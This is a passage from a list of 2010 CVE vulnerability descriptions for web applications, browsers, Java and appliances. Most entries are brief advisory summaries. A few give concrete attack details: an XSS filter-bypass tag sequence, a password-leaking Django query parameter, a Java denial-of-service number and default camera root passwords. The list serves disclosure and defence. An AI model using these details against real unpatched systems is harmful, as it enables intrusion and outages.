attacks via a crafted web site. [CVE-2010-4544] Cross-site scripting (XSS) vulnerability in the servlet in IBM Lotus Notes Traveler before 8.5.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4536] Multiple cross-site scripting (XSS) vulnerabilities in KSES, as used in WordPress before 3.0.4, allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the & (ampersand) character, (2) the case of an attribute name, (3) a padded entity, and (4) an entity that is not in normalized form. [CVE-2010-4534] The administrative interface in django.contrib.admin in Django before 1.1.3, 1.2.x before 1.2.4, and 1.3.x before 1.3 beta 1 does not properly restrict use of the query string to perform certain object filtering, which allows remote authenticated users to obtain sensitive information via a series of requests containing regular expressions, as demonstrated by a created_by__password__regex parameter. [CVE-2010-4530] Signedness error in ccid_serial.c in libccid in the USB Chip/Smart Card Interface Devices (CCID) driver, as used in pcscd in PCSC-Lite 1.5.3 and possibly other products, allows physically proximate attackers to execute arbitrary code via a smart card with a crafted serial number that causes a negative value to be used in a memcpy operation, which triggers a buffer overflow. NOTE: some sources refer to this issue as an integer overflow. [CVE-2010-4524] Cross-site scripting (XSS) vulnerability in lib/mhtxthtml.pl in MHonArc 2.6.16 allows remote attackers to inject arbitrary web script or HTML via a malformed start tag and end tag for a SCRIPT element, as demonstrated by <scr<body>ipt> and </scr<body>ipt> sequences. [CVE-2010-4522] Multiple cross-site scripting (XSS) vulnerabilities in MyBB (aka MyBulletinBoard) 1.4.14, and 1.6.x before 1.6.1, allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) editpost.php, (2) member.php, and (3) newreply.php. [CVE-2010-4521] Cross-site scripting (XSS) vulnerability in the Views module 6.x before 6.x-2.12 for Drupal allows remote attackers to inject arbitrary web script or HTML via a page path. [CVE-2010-4520] Multiple cross-site scripting (XSS) vulnerabilities in the Views module 6.x before 6.x-2.11 for Drupal allow remote attackers to inject arbitrary web script or HTML via (1) a URL or (2) an aggregator feed title. [CVE-2010-4518] Cross-site scripting (XSS) vulnerability in wp-safe-search/wp-safe-search-jx.php in the Safe Search plugin 0.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the v1 parameter. [CVE-2010-4516] Multiple cross-site scripting (XSS) vulnerabilities in the JXtended Comments component before 1.3.1 for Joomla allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4514] Cross-site scripting (XSS) vulnerability in Install/InstallWizard.aspx in DotNetNuke 5.05.01 and 5.06.00 allows remote attackers to inject arbitrary web script or HTML via the __VIEWSTATE parameter. NOTE: some of these details are obtained from third party information. [CVE-2010-4513] Multiple cross-site scripting (XSS) vulnerabilities in Zimplit CMS 3.0, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) file parameter in a load action to zimplit.php and (2) client parameter to English_manual_version_2.php. [CVE-2010-4508] The WebSockets implementation in Mozilla Firefox 4 through 4.0 Beta 7 does not properly perform proxy upgrade negotiation, which has unspecified impact and remote attack vectors, related to an "inherent problem" with the WebSocket specification. [CVE-2010-4507] Multiple cross-site request forgery (CSRF) vulnerabilities on the iSpot 2.0.0.0 R1679, and the ClearSpot 2.0.0.0 R1512 and R1786, with firmware 1.9.9.4 allow remote attackers to hijack the authentication of administrators for requests that (1) execute arbitrary commands via the cmd parameter in an act_cmd_result action to webmain.cgi, (2) enable remote management via an enable_remote_access act_network_set action to webmain.cgi, (3) enable the TELNET service via an ENABLE_TELNET act_set_wimax_etc_config action to webmain.cgi, (4) enable TELNET sessions via a certain act_network_set action to webmain.cgi, or (5) read arbitrary files via the FILE_PATH parameter in an act_file_download action to upgrademain.cgi. [CVE-2010-4506] Passlogix v-GO Self-Service Password Reset (SSPR) and OEM before 7.0A allows physically proximate attackers to execute arbitrary programs without authentication by triggering use of an invalid SSL certificate and using the Internet Explorer interface to navigate through the filesystem via a "Save As" dialog that is reachable from the "Certificate Export" wizard. [CVE-2010-4504] Multiple cross-site scripting (XSS) vulnerabilities in eSyndiCat Directory 2.3 allow remote attackers to inject arbitrary web script or HTML via the title parameter to (1) suggest-category.php and (2) suggest-listing.php. [CVE-2010-4499] Session fixation vulnerability in Collaborative Information Manager server, as used in TIBCO Collaborative Information Manager before 8.1.0 and ActiveCatalog before 1.0.1, allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2010-4497] Cross-site scripting (XSS) vulnerability in Collaborative Information Manager server, as used in TIBCO Collaborative Information Manager before 8.1.0 and ActiveCatalog before 1.0.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4489] libvpx, as used in Google Chrome before 8.0.552.215 and possibly other products, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted WebM video. NOTE: this vulnerability exists because of a regression. [CVE-2010-4485] Google Chrome before 8.0.552.215 does not properly restrict the generation of file dialogs, which allows remote attackers to cause a denial of service (reduced usability and possible application crash) via a crafted web site. [CVE-2010-4483] Google Chrome before 8.0.552.215 does not properly restrict read access to videos derived from CANVAS elements, which allows remote attackers to bypass the Same Origin Policy and obtain potentially sensitive video data via a crafted web site. [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. [CVE-2010-4475] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment. [CVE-2010-4471] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to 2D. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the exposure of system properties via vectors related to Font.createFont and exception text. [CVE-2010-4469] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is heap corruption related to the Verifier and "backward jsrs." [CVE-2010-4468] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, and 5.0 Update 27 and earlier, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity via unknown vectors related to JDBC. [CVE-2010-4467] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 10 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2010-4465] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue is related to the lack of framework support by AWT event dispatch, and/or "clipboard access in Applets." [CVE-2010-4464] Unspecified vulnerability in Oracle Sun Convergence 1.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail. [CVE-2010-4463] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 21 through 6 Update 23 allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2010-4456] Unspecified vulnerability in Oracle Sun Java System Communications Express 6.2 and 6.3 allows remote attackers to affect integrity via unknown vectors related to Web Mail. [CVE-2010-4453] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 7.0.7, 8.1.6, 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect integrity via unknown vectors related to Servlet Container. [CVE-2010-4452] Unspecified vulnerability in the Deployment component in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors. [CVE-2010-4448] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Networking. NOTE: the previous information was obtained from the February 2011 CPU. Oracle has not commented on claims from a downstream vendor that this issue involves "DNS cache poisoning by untrusted applets." [CVE-2010-4447] Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment. [CVE-2010-4437] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Servlet Container. [CVE-2010-4436] Unspecified vulnerability in Oracle Sun Management Center (SunMC) 4.0 allows remote attackers to affect confidentiality via unknown vectors related to Web Console. [CVE-2010-4429] Unspecified vulnerability in the Agile Core component in Oracle Supply Chain Products Suite 9.3.0.2 and 9.3.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Client, a different vulnerability than CVE-2010-3505. [CVE-2010-4427] Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.4.0, 10.1.3.4.1, and 11.1.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Web Server. [CVE-2010-4425] Unspecified vulnerability in the Oracle BI Publisher component in Oracle Fusion Middleware 10.1.3.3.2, 10.1.3.4.0, and 10.1.3.4.1 allows remote authenticated users to affect integrity via unknown vectors related to Web Server. [CVE-2010-4407] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AlGuest 1.1c-patched allow remote attackers to inject arbitrary web script or HTML via the (1) nome (nickname), (2) messaggio (message), and (3) link (homepage) parameters. [CVE-2010-4405] Cross-site scripting (XSS) vulnerability in the Yannick Gaultier sh404SEF component before 2.1.8.777 for Joomla! allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4402] Multiple cross-site scripting (XSS) vulnerabilities in wp-login.php in the Register Plus plugin 3.5.1 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) firstname, (2) lastname, (3) website, (4) aim, (5) yahoo, (6) jabber, (7) about, (8) pass1, and (9) pass2 parameters in a register action. [CVE-2010-4396] Cross-zone scripting vulnerability in the HandleAction method in a certain ActiveX control in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.1.2 allows remote attackers to inject arbitrary web script or HTML in the Local Zone by specifying a local file in a NavigateToURL action, as demonstrated by a local skin file. [CVE-2010-4394] Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.5 allows remote web servers to execute arbitrary code via a long Server header in a response to an HTTP request that occurs during parsing of a RealPix file. [CVE-2010-4367] awstats.cgi in AWStats before 7.0 accepts a configdir parameter in the URL, which allows remote attackers to execute arbitrary commands via a crafted configuration file located on a (1) WebDAV server or (2) NFS server. [CVE-2010-4366] Multiple cross-site scripting (XSS) vulnerabilities in forum_new_topic.php in Chameleon Social Networking allow remote attackers to inject arbitrary web script or HTML via the (1) thread_title and (2) thread_description parameters in a message. [CVE-2010-4362] Multiple SQL injection vulnerabilities in MicroNetsoft RV Dealer Website allow remote attackers to execute arbitrary SQL commands via the (1) selStock parameter to search.asp and the (2) orderBy parameter to showAlllistings.asp. [CVE-2010-4361] Cross-site scripting (XSS) vulnerability in url-gateway.php in Jurpopage 0.2.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown [CVE-2010-4358] Multiple cross-site scripting (XSS) vulnerabilities in gb.cgi in MRCGIGUY (MCG) Guestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, (3) website, and (4) message parameters. [CVE-2010-4355] Cross-site scripting (XSS) vulnerability in DaDaBIK before 4.3 beta2, when the insert or edit feature is enabled, allows remote authenticated users to inject arbitrary web script or HTML via the select_single parameter. [CVE-2010-4348] Cross-site scripting (XSS) vulnerability in admin/upgrade_unattended.php in MantisBT before 1.2.4 allows remote attackers to inject arbitrary web script or HTML via the db_type parameter, related to an unsafe call by MantisBT to a function in the ADOdb Library for PHP. [CVE-2010-4339] Cross-site scripting (XSS) vulnerability in Hypermail 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted From address, which is not properly handled when indexing messages. [CVE-2010-4331] Multiple cross-site scripting (XSS) vulnerabilities in Seo Panel 2.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) default_news or (2) sponsors cookies, which are not properly handled by (a) controllers/index.ctrl.php or (b) controllers/settings.ctrl.php. [CVE-2010-4329] Cross-site scripting (XSS) vulnerability in the PMA_linkOrButton function in libraries/common.lib.php in the database (db) search script in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1 allows remote attackers to inject arbitrary web script or HTML via a crafted request. [CVE-2010-4324] Cross-site scripting (XSS) vulnerability in the Approval Form in the User Application in the Roles Based Provisioning Module 3.7.0 before 370D in Novell Identity Manager (aka IDM) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4322] Cross-site scripting (XSS) vulnerability in gwtTeaming.rpc in Novell Vibe OnPrem 3 BETA allows remote authenticated users to inject arbitrary web script or HTML via the Micro Blog (aka What Are You Working On?) field. [CVE-2010-4284] SQL injection vulnerability in the authentication form in the integrated web server in the Data Management Server (DMS) before 1.4.3 in Samsung Integrated Management System allows remote attackers to execute arbitrary SQL commands via unspecified vectors. [CVE-2010-4277] Cross-site scripting (XSS) vulnerability in lembedded-video.php in the Embedded Video plugin 4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the content parameter to wp-admin/post.php. [CVE-2010-4276] Cross-site scripting (XSS) vulnerability in the lz_tracking_set_sessid function in templates/jscript/jstrack.tpl in LiveZilla 3.2.0.2 allows remote attackers to inject arbitrary web script or HTML via the livezilla parameter in a track action to server.php. [CVE-2010-4275] Multiple cross-site scripting (XSS) vulnerabilities in Radius Manager 3.8.0 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) name or (2) descr parameter in an (a) update_usergroup or a (b) store_nas action to admin.php. [CVE-2010-4246] Multiple cross-site scripting (XSS) vulnerabilities in graph.php in pfSense 1.2.3 and 2 beta 4 allow remote attackers to inject arbitrary web script or HTML via the (1) ifnum or (2) ifname parameter, a different vulnerability than CVE-2008-1182. [CVE-2010-4234] The web server on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to cause a denial of service (device reboot) via a large number of requests in a short time interval. [CVE-2010-4233] The Linux installation on the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 has a default password of m for the root account, and a default password of merlin for the mg3500 account, which makes it easier for remote attackers to obtain access via the TELNET interface. [CVE-2010-4220] Cross-site scripting (XSS) vulnerability in the Integrated Solution Console in the Administrative Console component in IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, related in part to "URL injection." [CVE-2010-4219] Cross-site scripting (XSS) vulnerability in SemanticTagService.js in IBM WebSphere Portal 6.1.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2010-4218] Unspecified vulnerability in Web Services in IBM ENOVIA 6 has unknown impact and attack vectors, related to a system that becomes "exposed to the internet." [CVE-2010-4212] The USAA application 3.0 for Android stores a mirror image of each visited web page, which might allow physically proximate attackers to obtain sensitive banking information by reading application data. [CVE-2010-4211] The PayPal app before 3.0.1 for iOS does not verify that the server hostname matches the domain name of the subject of an X.509 certificate, which allows man-in-the-middle attackers to spoof a PayPal web server via an arbitrary certificate. [CVE-2010-4209] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.8.0 through 2.8.1, as used in Bugzilla 3.7.1 through 3.7.3 and 4.1, allows remote attackers to inject arbitrary web script or HTML via vectors related to swfstore/swfstore.swf. [CVE-2010-4208] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.5.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to uploader/assets/uploader.swf. [CVE-2010-4207] Cross-site scripting (XSS) vulnerability in the Flash component infrastructure in YUI 2.4.0 through 2.8.1, as used in Bugzilla, Moodle, and other products, allows remote attackers to inject arbitrary web script or HTML via vectors related to charts/assets/charts.swf. [CVE-2010-4206] Array index error in the FEBlend::apply function in WebCore/platform/graphics/filters/FEBlend.cpp in WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted SVG document, related to effects in the application of filters. [CVE-2010-4204] WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, accesses a frame object after this object has been destroyed, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. [CVE-2010-4203] WebM libvpx (aka the VP8 Codec SDK) before 0.9.5, as used in Google Chrome before 7.0.517.44, allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via invalid frames. [CVE-2010-4198] WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, does not properly handle large text areas, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted HTML document. [CVE-2010-4197] Use-after-free vulnerability in WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors involving text editing. [CVE-2010-4183] Multiple cross-site scripting (XSS) vulnerabilities in HTML Purifier before 4.1.0, when Internet Explorer is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) background-image, (2) background, or (3) font-family Cascading Style Sheets (CSS) property, a different vulnerability than CVE-2010-2479. [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications. [CVE-2010-4166] Multiple SQL injection vulnerabilities in Joomla! 1.5.x before 1.5.22 allow remote attackers to execute arbitrary SQL commands via (1) the filter_order parameter in a com_weblinks category action to index.php, (2) the filter_order_Dir parameter in a com_weblinks category action to index.php, or (3) the filter_order_Dir parameter in a com_messages action to administrator/index.php. [CVE-2010-4155] Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.10 allow remote attackers to inject arbitrary web script or HTML via the (1) rssfeedURL parameter to manual/caferss/example.php and the sumb parameter to (2) modules/news/archive.php, (3) modules/news/topics.php, and (4) modules/contact/index.php, different vectors than CVE-2007-1965. [CVE-2010-4149] Directory traversal vulnerability in FreshWebMaster Fresh FTP 5.36, 5.37, and possibly earlier, allows remote FTP servers to write arbitrary files via a "..\" (dot dot backslash) in a filename. NOTE: some of these details are obtained from third party information. [CVE-2010-4146] Cross-site scripting (XSS) vulnerability in Attachmate Reflection for the Web 2008 R2 (builds 10.1.569 and earlier), 2008 R1, and 9.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4145] Kisisel Radyo Script stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for sevvo/eco23.mdb. [CVE-2010-4120] Multiple cross-site scripting (XSS) vulnerabilities in the TAM console in IBM Tivoli Access Manager for e-business 6.1.0 before 6.1.0-TIV-TAM-FP0006 allow remote attackers to inject arbitrary web script or HTML via (1) the parm1 parameter to ivt/ivtserver, or the method parameter to (2) acl, (3) domain, (4) group, (5) gso, (6) gsogroup, (7) os, (8) pop, (9) rule, (10) user, or (11) webseal in ibm/wpm/. [CVE-2010-4114] Cross-site scripting (XSS) vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.5x, 7.5x, and 7.6x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4113] Stack-based buffer overflow in HP Power Manager (HPPM) before 4.3.2 allows remote attackers to execute arbitrary code via a long Login variable to the management web server. [CVE-2010-4111] Cross-site scripting (XSS) vulnerability in HP Insight Diagnostics Online Edition before 8.5.1.3712 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4109] Cross-site scripting (XSS) vulnerability in the Contacts Application in HP Palm webOS before 2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted vCard file. [CVE-2010-4101] Cross-site scripting (XSS) vulnerability in HP Insight Recovery before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4097] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Aardvark Topsites PHP 5.2.0 and 5.2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) mail, (2) title, (3) u, and (4) url parameters. NOTE: the q parameter is already covered by CVE-2009-2302. [CVE-2010-4092] Use-after-free vulnerability in an unspecified compatibility component in Adobe Shockwave Player before 11.5.9.620 allows user-assisted remote attackers to execute arbitrary code via a crafted web site, related to the Shockwave Settings window and an unloaded library. NOTE: some of these details are obtained from third party information. [CVE-2010-4072] The copy_shmid_to_user function in ipc/shm.c in the Linux kernel before 2.6.37-rc1 does not initialize a certain structure, which allows local users to obtain potentially sensitive information from kernel stack memory via vectors related to the shmctl system call and the "old shm interface." [CVE-2010-4071] Cross-site scripting (XSS) vulnerability in AgentTicketZoom in OTRS 2.4.x before 2.4.9, when RichText is enabled, allows remote attackers to inject arbitrary web script or HTML via JavaScript in an HTML e-mail. [CVE-2010-4048] Opera before 10.63 allows user-assisted remote web servers to cause a denial of service (application crash) by sending a redirect during the saving of a file. [CVE-2010-4047] Opera before 10.63 does not properly select the security context of JavaScript code associated with an error page, which allows user-assisted remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site. [CVE-2010-4045] Opera before 10.63 does not properly restrict web script in unspecified circumstances involving reloads and redirects, which allows remote attackers to spoof the Address Bar, conduct cross-site scripting (XSS) attacks, and possibly execute arbitrary code by leveraging the ability of a script to interact with a web page from (1) a different domain or (2) a different security context. [CVE-2010-4038] The Web Sockets implementation in Google Chrome before 7.0.517.41 does not properly handle a shutdown action, which allows remote attackers to cause a denial of service (application crash) via unspecified vectors. [CVE-2010-4030] Cross-site scripting (XSS) vulnerability in HP Insight Control Performance Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-4028] Unspecified vulnerability in LoadRunner Web Tours 9.10 in HP LoadRunner 9.1 and earlier allows remote attackers to cause a denial of service, and possibly obtain sensitive information or modify data, via unknown vectors. [CVE-2010-4027] Unspecified vulnerability in the camera application in HP Palm webOS 1.4.1 allows local users to overwrite arbitrary files via unknown vectors. [CVE-2010-4026] Unspecified vulnerability in the service API in HP Palm webOS 1.4.1 allows local users to gain privileges by leveraging the ability to perform certain service calls. [CVE-2010-4025] Unspecified vulnerability in Doc Viewer in HP Palm webOS 1.4.1 allows remote attackers to execute arbitrary code via a crafted document, as demonstrated by a Word document. [CVE-2010-4023] Cross-site scripting (XSS) vulnerability in HP Insight Control Power Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3994] Cross-site scripting (XSS) vulnerability in HP Version Control Repository Manager (VCRM) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3991] Cross-site scripting (XSS) vulnerability in HP Insight Control Server Migration before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3987] Cross-site scripting (XSS) vulnerability in HP Insight Control Virtual Machine Management before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3985] Cross-site scripting (XSS) vulnerability in HP Operations Orchestration before 9.0, when Internet Explorer 6.0 is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3981] Cross-site scripting (XSS) vulnerability in SAP BusinessObjects Enterprise XI 3.2 allows remote attackers to inject arbitrary web script or HTML via the ServiceClass field to the Edit Service Parameters page. [CVE-2010-3977] Multiple cross-site scripting (XSS) vulnerabilities in wp-content/plugins/cforms/lib_ajax.php in cforms WordPress plugin 11.5 allow remote attackers to inject arbitrary web script or HTML via the (1) rs and (2) rsargs[] parameters. [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3936] Cross-site scripting (XSS) vulnerability in Signurl.asp in Microsoft Forefront Unified Access Gateway (UAG) 2010 Gold, 2010 Update 1, and 2010 Update 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "XSS in Signurl.asp Vulnerability." [CVE-2010-3931] Cross-site scripting (XSS) vulnerability in multiple Rocomotion products, including P board 1.18 and other versions, P forum 1.30 and earlier, P up board 1.38 and other versions, P diary R 1.13 and earlier, P link 1.11 and earlier, P link compact 1.04 and earlier, pplog 3.31 and earlier, pplog2 3.37 and earlier, PM bbs 1.07 and earlier, PM up bbs 1.08 and earlier, and PM forum 1.18 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2010-3926] Multiple cross-site scripting (XSS) vulnerabilities in Shop.cgi in SGX-SP Final before 11.00 and SGX-SP Final NE before 11.00 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3921] Cross-site scripting (XSS) vulnerability in Movable Type 4.x before 4.35 and 5.x before 5.04 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2010-3919] Fenrir Grani 4.5 and earlier does not prevent interaction between web script and the clipboard, which allows remote attackers to read or modify the clipboard contents via a crafted web site. [CVE-2010-3918] Fenrir Sleipnir 2.9.6 and earlier does not prevent interaction between web script and the clipboard, which allows remote attackers to read or modify the clipboard contents via a crafted web site. [CVE-2010-3911] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM before 5.2.1 allow remote attackers to inject arbitrary web script or HTML via (1) the username (aka default_user_name) field or (2) the password field in a Users Login action to index.php, or (3) the label parameter in a Settings GetFieldInfo action to index.php, related to modules/Settings/GetFieldInfo.php. [CVE-2010-3906] Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) f and (2) fp parameters. [CVE-2010-3905] The password reset feature in the administrator interface for Eucalyptus 2.0.0 and 2.0.1 does not perform authentication, which allows remote attackers to gain privileges by sending password reset requests for other users. [CVE-2010-3902] OpenConnect before 2.26 places the webvpn cookie value in the debugging output, which might allow remote attackers to obtain sensitive information by reading this output, as demonstrated by output posted to the public openconnect-devel mailing list. [CVE-2010-3900] Midori before 0.2.5, when WebKitGTK+ before 1.1.14 or LibSoup before 2.29.91 is used, does not verify X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary https web sites via a crafted server certificate, a related issue to CVE-2010-3312. [CVE-2010-3899] IBM OmniFind Enterprise Edition 8.x and 9.x performs web crawls with an unlimited recursion depth, which allows remote web servers to cause a denial of service (infinite loop) via a crafted series of documents. [CVE-2010-3898] IBM OmniFind Enterprise Edition 8.x and 9.x does not properly restrict the cookie path of administrator (aka ESAdmin) cookies, which might allow remote attackers to bypass authentication by leveraging access to other pages on the web site. [CVE-2010-3894] Stack-based buffer overflow in the Java_com_ibm_es_oss_CryptionNative_ESEncrypt function in /opt/IBM/es/lib/libffq.cryptionjni.so in the login form in the administration interface in IBM OmniFind Enterprise Edition before 8.5 FP6 allows remote attackers to execute arbitrary code via a long password. [CVE-2010-3893] The administrator interface in IBM OmniFind Enterprise Edition 8.x and 9.x does not restrict use of a session ID (aka SID) value to a single IP address, which allows remote attackers to perform arbitrary administrative actions by leveraging cookie theft, related to a "session impersonation" issue. [CVE-2010-3891] Cross-site request forgery (CSRF) vulnerability in ESAdmin/security.do in the administrator interface in IBM OmniFind Enterprise Edition before 9.1 allows remote attackers to hijack the authentication of administrators for requests that add an administrative user via a saveNewUser action. [CVE-2010-3882] Multiple cross-site scripting (XSS) vulnerabilities in CMS Made Simple 1.7.1 and earlier allow remote attackers to inject arbitrary web script or HTML via input to the (1) Add Pages, (2) Add Global Content, (3) Edit Global Content, (4) Add Article, (5) Add Category, (6) Add Field Definition, or (7) Add Shortcut module. [CVE-2010-3871] Cross-site scripting (XSS) vulnerability in blocktype/groupviews/theme/raw/groupviews.tpl in Mahara before 1.3.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2010-3841] Multiple cross-site scripting (XSS) vulnerabilities in lib/TWiki.pm in TWiki before 5.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the rev parameter to the view script or (2) the query string to the login script. [CVE-2010-3829] WebKit in Apple iOS before 4.2 allows remote attackers to bypass the remote image loading setting in Mail via an HTML LINK element with a 